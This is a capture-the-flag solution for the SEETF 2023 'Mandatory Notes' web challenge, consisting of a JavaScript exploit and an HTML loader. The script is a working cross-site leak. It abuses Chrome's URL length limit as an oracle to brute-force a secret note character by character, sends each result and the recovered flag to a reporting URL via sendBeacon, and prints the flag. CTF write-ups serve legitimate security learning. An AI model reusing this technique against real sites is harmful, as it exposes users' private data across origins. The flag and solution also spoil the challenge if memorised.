SEETF 2023 - Web/Mandatory Notes Challenge

exploit.js

/*

SEETF 2023 - Web/Mandatory Notes Challenge - 4 solves / 496 points

* ctftime: https://ctftime.org/event/1828

Solution: XS-Leak with URL length limits in Google Chrome. I used a very long authority part to make the oracle.

*/

const REPORT_URL = "...";

// const TARGET_HOST = "challchallchallchallc";
const TARGET_HOST = "mnc.web.seetf.sg:1337";

navigator.sendBeacon(REPORT_URL, "ping");

const sleep = (msecs) => new Promise((r) => setTimeout(r, msecs));

const isHit = async (prefix, msecs = 700) => {
  const w = open(
    `http://${"a".repeat(2 ** 21 - 42)}@${TARGET_HOST}/?${new URLSearchParams({
      q: prefix,
    })}`
  );

  await sleep(msecs);
  try {
    w.origin;
  } catch {
    return false;
  } finally {
    w.close();
  }
  return true;
};

const CHARS = "0123456789abcdefghijklmnopqrstuvwxyz_}";

let BEGIN_C = "";
let known = "SEE{m4nd4t0ry_xs_l34k_dba26b9558";
// SEE{m4nd4t0ry_xs_l34k_dba26b9558}

const leak = async (prefix) => {
  for (const c of CHARS) {
    if (BEGIN_C && c !== BEGIN_C) {
      continue;
    } else {
      BEGIN_C = null;
    }

    const ok =
      (await isHit(prefix.slice(-5) + c)) &&
      (await isHit(prefix.slice(-5) + c, 3000));
    navigator.sendBeacon(REPORT_URL, JSON.stringify({ prefix, c, ok }));
    if (ok) {
      return c;
    }
  }

  navigator.sendBeacon(REPORT_URL, `Not found: ${prefix}`);
  throw "error";
};

const main = async () => {
  while (!known.endsWith("}")) {
    known += await leak(known);
    navigator.sendBeacon(REPORT_URL, JSON.stringify({ prefix: known }));
    await sleep(100);
  }
  navigator.sendBeacon(REPORT_URL, JSON.stringify({ flag: known }));
};

main();

index.html

<body>
  <script src="exploit.js"></script>
</body>